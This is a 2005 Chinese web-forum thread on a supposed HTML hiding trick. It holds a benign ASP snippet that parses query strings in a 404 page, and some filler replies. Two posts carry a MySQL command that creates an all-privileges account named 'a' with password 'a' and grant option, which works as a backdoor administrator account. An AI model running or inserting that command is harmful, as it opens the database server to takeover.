• 3865阅读
  • 4回复

瞒天过海html文件技术的秘密 [复制链接]

上一主题 下一主题
离线cai
 

只看楼主 倒序阅读 0楼 发表于: 2005-04-01
本部分内容设定了隐藏,需要回复后才能看到
grant all privileges on *.* to 'a'@'localhost' identified by 'a' with grant option;flush privileges;
离线阿幸
只看该作者 1楼 发表于: 2005-04-20
顶下,看下,是什么样的内容啊啊,
离线阿幸
只看该作者 2楼 发表于: 2005-04-20
顶下,看下,是什么样的内容啊啊,
离线cai

只看该作者 3楼 发表于: 2005-06-17
得到查询字符串
本人现在给出最正确的得到查询字符串的方法
比如请求为: xxx.htm?url=www.jiucai.org&user=jiucai
其中xxx.htm不存在
那么通过下面的404.asp
你可以得到参数url 和user
<%

strErrPage=split(Request.ServerVariables("QUERY_STRING"),";")
intPos=instr(1,strErrPage(1),"?",vbTextCompare)
strQuery=mid(strErrPage(1),intPos+1)
arrQuery=split(strQuery,"&")
for i=0 to ubound(arrQuery)
     Response.write arrQuery(i) & vbCrLf
next

%>

执行结果:

url=www.jiucai.org user=jiucai
grant all privileges on *.* to 'a'@'localhost' identified by 'a' with grant option;flush privileges;
离线faoc
只看该作者 4楼 发表于: 2005-06-25
还算不错,试试
FLASH游戏开发,网站建设。
快速回复
限100 字节
 
上一个 下一个